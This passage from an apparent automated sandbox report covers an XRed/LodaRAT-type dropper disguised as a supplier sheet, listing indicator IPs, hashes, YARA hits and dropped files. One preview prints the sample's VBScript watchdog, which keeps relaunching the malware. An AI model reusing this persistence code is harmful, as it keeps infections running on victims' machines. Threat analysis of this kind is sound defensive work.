                                                                                                            1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 104.243.246.120
                                                                                                            nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 46.243.206.70
                                                                                                            7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 37.221.166.158
                                                                                                            fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 5.254.60.108
                                                                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 37.221.160.225
                                                                                                            Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            AWKNET-LLCUSzhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
Match: 37f463bf4616ecd445d4a1937da06e19
• Filename: zhuzhu.exe, Detection: malicious, Threat Name: GhostRat, XRed, Context: 142.250.181.225, 216.58.206.46
• Filename: setup.msi, Detection: malicious, Threat Name: Unknown, Context: 142.250.181.225, 216.58.206.46
• Filename: Lets-x64.exe, Detection: malicious, Threat Name: Nitol, Zegost, Context: 142.250.181.225, 216.58.206.46
• Filename: KL-3.1.16.exe, Detection: malicious, Threat Name: Nitol, Zegost, Context: 142.250.181.225, 216.58.206.46
• Filename: Whyet-4.9.exe, Detection: malicious, Threat Name: Nitol, Zegost, Context: 142.250.181.225, 216.58.206.46
• Filename: QQyisSetups64.exe, Detection: malicious, Threat Name: GhostRat, Context: 142.250.181.225, 216.58.206.46
• Filename: wyySetups64.exe, Detection: malicious, Threat Name: GhostRat, Context: 142.250.181.225, 216.58.206.46
• Filename: aYu936prD4.exe, Detection: malicious, Threat Name: Unknown, Context: 142.250.181.225, 216.58.206.46
• Filename: aYu936prD4.exe, Detection: malicious, Threat Name: Unknown, Context: 142.250.181.225, 216.58.206.46
Match: C:\ProgramData\Synaptics\RCXC902.tmp
• Filename: Purchase Order No. G02873362-Docx.vbs, Detection: malicious, Threat Name: LodaRAT, XRed
• Filename: RNEQTT.exe, Detection: malicious, Threat Name: LodaRAT, XRed
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):118
                                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<HeartbeatCache/>
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.133154008930874
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:USQjVpsXImo0WMn4DzJDzqjLOA/StzxwzuiF1Z24IO8EKDzy:0yX5WMn4Jqj8KzuiF1Y4IO8zy
                                                                                                                MD5:042C37188BE90246119E3D2DB9EAC516
                                                                                                                SHA1:13D0BFEED67B48C8EC144B10408E5ADE09F02B20
                                                                                                                SHA-256:C126AEC827A4C0B89FEC06BE5CBA1C4B0F329E95F9CDA852C47676B51A10D1C9
                                                                                                                SHA-512:B2BE0D9DD7246AD57179FE124981FD093171DC3EB0EF3714D52C9484B316BECC31272E7D3F9B14144D3C9259448A73874E28720375FBBA65D27B0E157902A455
                                                                                                                Malicious:false
                                                                                                                Preview:Version=1..EventType=APPCRASH..EventTime=133800300449008142..ReportType=2..Consent=1..UploadTime=133800300523695653..ReportStatus=524384..ReportIdentifier=ad91e9f1-9857-44c5-a332-e644bb8bb902..IntegratorReportIdentifier=f33418be-8316-40fd-b7db-ace056083e44..Wow64Host=34404..Wow64Guest=332..NsAppName=Synaptics.exe..AppSessionGuid=00001cf4-0001-0014-e8c0-d44fa15adb01..TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000b0e8641656be739af701e0bc197dd3942172ea92!Synaptics.exe..TargetAppVe
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 11:00:46 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3343604
                                                                                                                Entropy (8bit):2.037259826570782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:De7eN/Dcouud+5v6901js0bvuHhUHdU7F5dJ8uoqZsT7Sjzr9uisI1Xjf+cU0UDZ:Detudho28
                                                                                                                MD5:BB5A86F9FE41D1EEB3B520754ACAB7D6
                                                                                                                SHA1:7EE715CC73D6885EA13C577819BFA44BB7341054
                                                                                                                SHA-256:E269645E257E2EFB351464CA753D857379F836EDEFAB1EC017EA6BA2A42D4C2E
                                                                                                                SHA-512:B2461DAF60CFEE9F62A4E17386D0B7EDDD2AAED74E939CC8C43104E48694B8CD3784A9D88BDCF0781BCBED645C45DD287AD2FF7303488B48D1D7CD03D120032A
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6306
                                                                                                                Entropy (8bit):3.713569127608964
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJ/xw6vCANGYiSWSpDu89bq7YMsf0OOm:R6lXJO6WYuIq7Yffb
                                                                                                                MD5:7118F8ABC0FF770CFF1198AC511B3830
                                                                                                                SHA1:74E873EC0DA550EBE352B2DA223C92901B47B9B7
                                                                                                                SHA-256:92B895A42AB1D10FCC84C218F89395A572B0AF5D851702E091107B3F106F5C59
                                                                                                                SHA-512:98333EA18D6BF6EC230777EB5525BC8FC3FE0A397E9CBD7E6AC0258DC268DDFC468BDBE1E0B1F6831A561F32607E25A5D3F4EDD36A7B6D5CEB1835DD6EFAF7FB
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7412</Pi
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4572
                                                                                                                Entropy (8bit):4.445033363351891
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zslJg77aI9zIWpW8VYkYm8M4JFetF0vt+q84isBZ1Z3d:uIjf/I7Bh7VwJN7BnZ3d
                                                                                                                MD5:D700C41EC652DEEECC3EE99CAF10D707
                                                                                                                SHA1:B97C7C0B079FEE522595CD61C7F1377454E629D7
                                                                                                                SHA-256:9855C19578E47FE7EE3520A3BDF3034FF17711BAA07987CA574668FD883B8EF7
                                                                                                                SHA-512:05E8086EDF15C76DB041C9BCF7A5197F15D830E0E37D6FBEA3CFBABD4F20B9827CF3152FCF13872D09AD7CED172589BE6109F720BBAE20CA5CE78466976CD873
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653883" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):771584
                                                                                                                Entropy (8bit):6.629891194746731
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXC902.tmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXC902.tmp, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: Purchase Order No. G02873362-Docx.vbs, Detection: malicious
                                                                                                                • Filename: RNEQTT.exe, Detection: malicious
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1685504
                                                                                                                Entropy (8bit):7.450501854996061
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:MnsJ39LyjbJkQFMhmC+6GD9nhloDX0XOf4Z79H8qN3k87zwVb2UDEusw:MnsHyjtk2MYC5GD5hloJf68qIyUDEuL
                                                                                                                MD5:97E5BA8188B0E2613FD02EE2B8DFEE7A
                                                                                                                SHA1:17E314B66392D3D14E68F3E4A0CE4E3649255835
                                                                                                                SHA-256:2D976B78EFE5C7E983FF4CEF98DEB25D21A901E8F954F6D915D5642E75420296
                                                                                                                SHA-512:DBB0C03170D807BE5E43DEB0FD7F1198BB56606CD4BB65D3CCB00B19759336F84C49072BAEDC6E674DB308F58618F58E7D6DE24FCB12C7F951DE04E7E9C76E1F
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265856083766831
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QNbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                MD5:CEB2E715237F69A0D8C1ED0B1313EC0D
                                                                                                                SHA1:608CB648E4B7B9F0D5FAE7993BC129AE42444CBC
                                                                                                                SHA-256:57B292321A67EE9252FFF54B74CDF5DA3488B24B72E4047D907B26B66BB6929C
                                                                                                                SHA-512:E3619D6FC38BAEFA518482E939C26B4D7A7348075C45D2A995B4241B80359376B19327E1B5BA804CE8D49ED78192209DACA484B33AC3884C6DEDE7B02FE5A9C9
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AdBUf5KfuW4Sg3Vt0xCHHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.261527325926892
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:B7C7E8F2AF632DC3EBC09CC903FA75BF
                                                                                                                SHA1:B1543D0CCF7C98C4B130B37ED5E542958F49AC3A
                                                                                                                SHA-256:F95A1694580B534A9B1B8F041CE1D8C0BA2FB502FB4EA9BD240F8DD793FAE1F0
                                                                                                                SHA-512:BD7472B96D2F51C01305EA5B88B7E04613786687C26969ECA459A8B7AD9C2EDD4FF843AD89415DB99B13DC34398D0C22B71E37ADDFE26E2449CB638A37A00B77
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.2706230677489145
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0lCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+mC+pAZewRDK4mW
                                                                                                                MD5:EB2B943E5E643A556CAD6C6FDAF3C028
                                                                                                                SHA1:D1797A4452CB30BF742CF53A641106689EAFE291
                                                                                                                SHA-256:7AEE0088B0E893131CEB562E8F55F9122D95E006475B64FF6F40EE8C739D7B06
                                                                                                                SHA-512:59BD23FF5DAE785454B546EB61A914CFB7DB6DA6B914636DCD5A7E6FAE523C3CFA91A53C03E2F84CCA6CD7D5AA4C1060D5398B460AB57CAD496E38BAF13AC71C
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.2656604573273915
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0cd01WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+zdr+pAZewRDK4mW
                                                                                                                MD5:D026ECCC935A6BC68C4494C68D365EC9
                                                                                                                SHA1:D8AC7ADDF87403E725D0DA3291622D71B22B4E9D
                                                                                                                SHA-256:11726E1DBDD2DA4544AF31DC1B8FFFB88BE9312F961A84BA4BC4CF90BF3D09DC
                                                                                                                SHA-512:5FFB77D99B57180A71FF9079D01816A0CE292273D69EB7E3403CBA086959D69632FA284B08696338B0D1F01B99D30A4C607659356509C6042EEF0D9C2D25BD99
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266071398588645
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:78EB787A78AECB8080B1E1B24CF6B359
                                                                                                                SHA1:08504960C6AB4F2D4AA271EA67445143774592A6
                                                                                                                SHA-256:80C2169AE63418984135215C118E1E755F174373AA5510674EE1D695A57AABBF
                                                                                                                SHA-512:AFC4A1E15FD8E4DE0BC697D9547C2C787363D6ADA07741C94B55060B2CD347C73BFCD9608AB464E16CD9912BA8A899519B8688AEFA56524263F3F2C36A84E443
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.272950351317562
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0OoSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+lo+pAZewRDK4mW
                                                                                                                MD5:52CE1F756107FC17AB8A6431C63F3C62
                                                                                                                SHA1:5723924A938E7C91D915F8BD991BAB37B466881B
                                                                                                                SHA-256:00D3A77EECBB0D0ECA6E5CBB1B0B21DB91C4E60136E9AE0624914958E06923CC
                                                                                                                SHA-512:3A88012038E3E74C977197C317125A7B6D2C3E575B99AC7CDE230618B0F0878E8FDC9EBFC548C2C183572B2815008C8D6653D8616B2EB53A89103CBF2CD2CFA8
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.267438431078175
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0KvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                MD5:DF6B5E576CEE24A9C2CC49CA55FE4FE6
                                                                                                                SHA1:990C5016A29409C2658778E2AF5AC1A4ACAE2ED6
                                                                                                                SHA-256:66291597965773FA8E492261D7CFE393121C1AF57970C896FD87E6F4AB631C8A
                                                                                                                SHA-512:C835D7D0AD4226CA13DAEB6206E3C1A3B28408C560F8525B62C1987A54047DBA72076856D800ED93F8F60202E049A7C18EC61009567E5C9E8D6F22F07CD9C924
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266759395435363
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                                                MD5:401CBEFB7EA588F9B762D84A8578DD2D
                                                                                                                SHA1:47C713A5780D09EB54B72B92AF814F66F1729793
                                                                                                                SHA-256:3455671A7017C20C9A70A1E30502F8CDA9D429E1B04280C2F48178297F3CC6C2
                                                                                                                SHA-512:DC81BC62C5F899680DBCEEE2D2D4FCA4418073A0A091B97C10C6CE6543649EB5494E3303CEC30DBBAA74A38704E138AB5586A4F331BFE3FBA57E01E40046DD14
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256223929478654
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0ws4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5j+pAZewRDK4mW
                                                                                                                MD5:EDD138D81DF757543DF638C90F36CF41
                                                                                                                SHA1:E90FD75C26A83A34FF0BA1AB5E3173231221ACE4
                                                                                                                SHA-256:68514F4860448DC311CB36E52EACF79A7BCC325A52CADE4768679B3526F03BDE
                                                                                                                SHA-512:30C546E7D289F22A324740D2734D59E825E75EBD6563D0BB6BDD2937015D4438948AD95FE3232BBCADF9E0A2642A7A4235DE6E34801010E90C0CF947F9BF2559
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.259154212119844
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                                MD5:B8DE1941AF6AD63B6EB03D20BE27C7EC
                                                                                                                SHA1:810E007F76D76F4A467DCCE67D057C32492171C5
                                                                                                                SHA-256:6AB0813E9F7DF56D2741176D1615D19F5782EF54FBD6AB655A279F151B218562
                                                                                                                SHA-512:6FDF4F720C78953841F375EFA5CCE8F35AD0B27F2FAA8469C08DD3C601AD6B24C682051220A3616B800B00F0CBBE9350CA6C4467F1D9548A53FB5A1A84EF736C
                                                                                                                Malicious:false
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256352959060174
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0GbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3b+pAZewRDK4mW
                                                                                                                MD5:87D7EE407E60561D4DCCAA0E9B02EA8B
                                                                                                                SHA1:CF2C56654C89AB101AF09DB553F3DEF87087A26F
                                                                                                                SHA-256:7B9A60407BCD5528E16112D5F125CE418051DE32DBD14D6AD9982B14A9526E45
                                                                                                                SHA-512:E216D0B133C2565DD525C5F14EDD6E285E3C53D7572A5009A5305C29C1A089398FC90B69BB738F68B5D446DD39AD9ACF30BCAE8B188E3CD7CB6E0807DC152F57
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):881
                                                                                                                Entropy (8bit):5.371225585903793
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:dF/UF1SmSpU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF1SmSit+G+7xLxe0WABNVIqZaVzgA
                                                                                                                MD5:3B53868CE1EA81ABDD6DBA5CA8927B70
                                                                                                                SHA1:87FFDC07C23A79559CB2DD7FD44FB53B6B6958F2
                                                                                                                SHA-256:BAE50248F9F181D5C0413478E0E520F0C4E905A6D6F573D9E306825A36CE697B
                                                                                                                SHA-512:FAEDC809AF7C1D5534F4EB5CC5013D6564EE2D1EAED3D079D51A5569C0069B5CD9B7DE4E1D9023D8FCEA7AEECA80DE39FFE023455AFC61390698E735E5F052D3
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_Supplier 0202AW-PER2 Sheet.exe"..fileset = """C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265318484210802
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0Q/zLDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Lv+pAZewRDK4mW
                                                                                                                MD5:179BF66299A661E53D7A2A2F13E673F8
                                                                                                                SHA1:78FF1A48BFAC69F0DC709A98E4F650E553EB1B8B
                                                                                                                SHA-256:4844AF524C57CE79A63DF59A509634147D70D49CE1D445B351DC894AA974D9F2
                                                                                                                SHA-512:2449396DE6F683896B0852234F5DDA0232BC4837C72F9C5EDF48D18BD0073F28331A091E2A293817A7D3051989B7495E218893754DAE43CE8B57925EE5F2F173
                                                                                                                Malicious:false
